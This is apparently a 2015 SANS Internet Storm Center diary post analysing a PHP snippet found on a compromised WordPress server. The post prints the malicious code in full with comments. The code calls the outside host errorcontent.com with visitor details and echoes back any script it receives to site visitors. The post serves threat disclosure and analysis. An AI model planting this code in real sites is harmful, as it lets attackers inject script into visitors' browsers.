Threat Level: green Handler on Duty: Tom Webb

SANS ISC Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

SYSINTERNALS Update(AccessChk v6.0, Autoruns v13.4, Process Monitor v3.2, VMMap v3.2)
ISC StormCast for Wednesday, May 27th 2015 http://isc.sans.edu/podcastdetail.html?id=4501

Possible Wordpress Botnet C&C: errorcontent.com

Published: 2015-05-26
Last Updated: 2015-05-26 16:36:15 UTC
by Johannes Ullrich (Version: 1)
3 comment(s)

Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):

 

#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */


/* only run the code if this is Chrome or IE and not a "bot" */

if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))
{  

# Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]

  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?  ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

# check if we have the curl extension installed 

if (function_exists('curl_init') && function_exists('curl_exec')) {

$ch= curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_8610mezd = curl_exec ($ch);
curl_close($ch);}

# if we don't have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}

# or try fopen as a last resort
​elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}

if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }

# The data retrieved will be echoed back to the user if it starts with the string "scr".

 

I haven't been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?

According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to 37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
3 comment(s)
Meet Johannes Ullrich at SANSFIRE!
ISC StormCast for Tuesday, May 26th 2015 http://isc.sans.edu/podcastdetail.html?id=4499

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Business Value in "Big Data"
4 days ago by Guy (0 comments)

Exploit kits delivering Necurs
5 days ago by Brad Duncan (8 comments)

Logjam - vulnerabilities in Diffie-Hellman key exchange affect browsers and servers using TLS
1 week ago by Brad Duncan (11 comments)

Upatre/Dyre malspam - Subject: eFax message from "unknown"
1 week ago by Brad Duncan (5 comments)

Lazy Coordinated Attacks Against Old Vulnerabilities
4 decades ago by Johannes (1 comment)

View All Diaries →

Latest Discussions

Seeing increased activity against port 5060 on my home pfSense firewall via Snort
created 1 day ago by Lee (1 reply)

Detecting the New Dridex Malware
created 5 days ago by Mostropi (0 replies)

What is the current Vulnerability targeted by Magnitude Exploit?
created 1 week ago by Mostropi (2 replies)

DShield-Top100 sources list vs the ASCII version
created 1 week ago by JamesW (1 reply)

Dshield shows "Rejected: Not an input block line"
created 1 week ago by Telserv (1 reply)

View All Forums →

Latest News

View All News →